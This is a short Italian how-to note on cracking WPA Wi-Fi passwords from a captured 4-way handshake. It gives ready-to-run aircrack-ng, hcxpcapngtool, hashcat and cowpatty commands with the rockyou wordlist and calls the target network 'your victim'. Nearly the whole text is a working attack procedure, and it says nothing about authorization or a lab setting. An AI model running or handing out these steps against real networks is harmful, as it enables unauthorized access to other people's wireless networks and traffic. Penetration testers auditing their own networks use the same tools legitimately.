tags: Hacking_WiFi Cracking_File_Pcap


Quando riusciamo a catturare uno scambio 4-way-handshake per esempio tramite wireshark possiamo provare a craccare la password per quell’AP nel seguente modo:

Verifica presenza di 4-Way-Handshake

aircrack-ng la_tua_cattura.pcap

Esempio di output

Index  BSSID              ESSID         Encryption     ...
  1    00:1A:2B:3C:4D:5E  ReteEsame     WPA (1 handshake)
  2    AA:BB:CC:DD:EE:FF  AltraRete     WPA (0 handshake)

Come vedi, aircrack-ng ti dice che per la ReteEsame (indice 1) ha “(1 handshake)“. Questa è la tua vittima. L’altra rete è inutile.

Lancio dell’attacco

Ora che sai di avere l’handshake e conosci il BSSID (00:1A:2B:3C:4D:5E), lanci l’attacco specificando la wordlist e il BSSID target.

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:1A:2B:3C:4D:5E la_tua_cattura.pcap

Hashcat

La fase di verifica va fatta tramite altri strumenti come aircrack-ng, ma tramite hashcat il crack è più veloce specialmente se si dispone di una GPU potente.

# Convertire pcap in formato hashcat
hcxpcapngtool -o hash.hc22000 capture.pcap
 
# Crackare con hashcat
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
 
# Con regole di trasformazione
hashcat -m 22000 hash.hc22000 -r /usr/share/hashcat/rules/best64.rule /usr/share/wordlists/rockyou.txt
 
# Mostrare password trovate
hashcat -m 22000 hash.hc22000 --show

Cowpatty

cowpatty -r capture.pcap -f /usr/share/wordlists/rockyou.txt -s <ESSID>